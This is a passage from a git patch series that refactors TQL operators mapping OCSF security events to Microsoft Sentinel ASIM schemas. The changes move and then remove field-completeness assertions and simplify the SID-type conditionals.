a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index ce7a181..47e9db3 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM Fi --- assert class_uid == 1001 +assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and (file?.path? else file?.name?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.file_event"} microsoft::asim::ocsf::helpers::common @@ -33,7 +35,5 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName } asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" -assert asim.ActorUsername != null and asim.TargetFilePath != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 3d1dc72..4db83aa 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -3,6 +3,8 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserMa --- assert class_uid == 3006 +assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.user_management"} microsoft::asim::ocsf::helpers::common @@ -15,7 +17,6 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 8322abb..27ad455 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSessio --- assert class_uid == 4002 +assert http_request?.url?.url_string? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.web_session"} microsoft::asim::ocsf::helpers::common @@ -16,6 +18,5 @@ asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_co if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index e537148..4f0c27d 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -3,6 +3,10 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM Proces --- assert class_uid == 1007 +assert activity_name? in ["Launch", "Terminate"], + message={reason: "unsupported OCSF to ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"} +assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and process?.pid? != null and (process?.name? else process?.file?.name? else process?.path?) != null and process?.cmd_line? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"} microsoft::asim::ocsf::helpers::common @@ -12,16 +16,7 @@ asim.EventSchemaVersion = "0.1.4" match ocsf.activity_name { "Launch" => { asim.EventType = "ProcessCreated" } "Terminate" => { asim.EventType = "ProcessTerminated" } - _ => { - assert false, message={ - reason: "unsupported OCSF to ASIM mapping", - class_uid: ocsf.class_uid?, - class_name: ocsf.class_name?, - type_uid: ocsf.type_uid?, - type_name: ocsf.type_name?, - name: @name, - } - } + _ => {} } asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { @@ -36,7 +31,5 @@ asim.TargetProcessId = ocsf.process?.pid?.string() asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1] asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index d41fa99..62d4db5 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM --- assert class_uid == 1006 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common @@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Scheduled Task" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index fc46d69..1fc5782 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASI --- assert class_uid == 201004 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common @@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Service" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { From bfa6182ebee176b199d9367020ed887cf6d87000 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:27:43 +0200 Subject: [PATCH 12/27] Allow best-effort ASIM OCSF mapping Keep class_uid guards on leaf mappers, but remove field-completeness assertions so supported OCSF classes can map whatever ASIM fields are available. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/compliance_finding.tql | 2 -- microsoft/operators/asim/ocsf/detection_finding.tql | 2 -- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 -- microsoft/operators/asim/ocsf/dns_activity.tql | 2 -- microsoft/operators/asim/ocsf/entity_management.tql | 2 -- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 -- microsoft/operators/asim/ocsf/file_system_activity.tql | 2 -- microsoft/operators/asim/ocsf/group_management.tql | 2 -- microsoft/operators/asim/ocsf/http_activity.tql | 2 -- microsoft/operators/asim/ocsf/process_activity.tql | 4 ---- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 -- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 -- 12 files changed, 26 deletions(-) diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 4384cff..3652d12 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -3,8 +3,6 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM Aler --- assert class_uid == 2003 -assert (finding_info?.uid? else metadata?.original_event_uid?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 54ae6af..064f73b 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -3,8 +3,6 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM Alert --- assert class_uid == 2004 -assert (finding_info?.uid? else metadata?.original_event_uid?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} let $threat_categories = { adware: "Adware", diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index e9a329b..7b3e052 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent --- assert class_uid == 4004 -assert src_endpoint?.ip? != null and src_endpoint?.mac? != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dhcp_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 0b2d829..dff6438 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns record --- assert class_uid == 4003 -assert query?.hostname? != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dns"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index c985b45..eb0025a 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -3,8 +3,6 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM Audit --- assert class_uid == 3004 -assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 01658bb..1f60436 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM Audi --- assert class_uid == 1008 -assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 47e9db3..9403a76 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM Fi --- assert class_uid == 1001 -assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and (file?.path? else file?.name?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.file_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 4db83aa..d5ec64b 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -3,8 +3,6 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserMa --- assert class_uid == 3006 -assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.user_management"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 27ad455..9c06324 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSessio --- assert class_uid == 4002 -assert http_request?.url?.url_string? != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.web_session"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 4f0c27d..3395d3f 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -3,10 +3,6 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM Proces --- assert class_uid == 1007 -assert activity_name? in ["Launch", "Terminate"], - message={reason: "unsupported OCSF to ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"} -assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and process?.pid? != null and (process?.name? else process?.file?.name? else process?.path?) != null and process?.cmd_line? != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 62d4db5..81f180c 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM --- assert class_uid == 1006 -assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 1fc5782..7d4303a 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -3,8 +3,6 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASI --- assert class_uid == 201004 -assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common From ce8063204098af8603bc96e64c7d1b3bc8e29116 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:33:56 +0200 Subject: [PATCH 13/27] Remove redundant null fallbacks Simplify ASIM OCSF mapper conditionals by dropping redundant else-null branches and using explicit boolean comparisons for optional SID predicates. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 6 +++--- microsoft/operators/asim/ocsf/authentication.tql | 4 ++-- microsoft/operators/asim/ocsf/authorize_session.tql | 4 ++-- microsoft/operators/asim/ocsf/compliance_finding.tql | 4 ++-- microsoft/operators/asim/ocsf/detection_finding.tql | 4 ++-- microsoft/operators/asim/ocsf/entity_management.tql | 2 +- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 6 +++--- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +- 11 files changed, 19 insertions(+), 19 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 2f438a8..0ac7957 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -16,7 +16,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true match ocsf.activity_name { "Create" => { asim.EventType = "UserCreated" } @@ -37,10 +37,10 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetUsernameType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.GroupName = ocsf.group?.name? asim.GroupId = ocsf.group?.uid? -asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null +asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 4a0e603..599e62c 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -34,7 +34,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? if ocsf.user?.domain? != null and ocsf.user?.name? != null { @@ -44,7 +44,7 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetDomainType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index d7eba65..7979689 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -31,7 +31,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? if ocsf.user?.domain? != null and ocsf.user?.name? != null { @@ -41,7 +41,7 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetDomainType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 3652d12..6e2ebd2 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -13,14 +13,14 @@ asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? else null +asim.EventReportUrl = ocsf.finding_info?.url? asim.EventSubType = "Compliance Violation" asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = "Security Policy Violation" asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 064f73b..fd6a6f2 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -28,14 +28,14 @@ asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? else null +asim.EventReportUrl = ocsf.finding_info?.url? asim.EventSubType = "Threat" asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index eb0025a..4596c6a 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 1f60436..a18038f 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index d5ec64b..78da3a0 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -16,7 +16,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true match ocsf.activity_name { "Create" => { asim.EventType = "GroupCreated" } @@ -33,10 +33,10 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetUsernameType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.GroupName = ocsf.group?.name? asim.GroupId = ocsf.group?.uid? -asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null +asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 3395d3f..ee0c83a 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -20,7 +20,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string() asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string() asim.TargetProcessId = ocsf.process?.pid?.string() diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 81f180c..306a042 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if 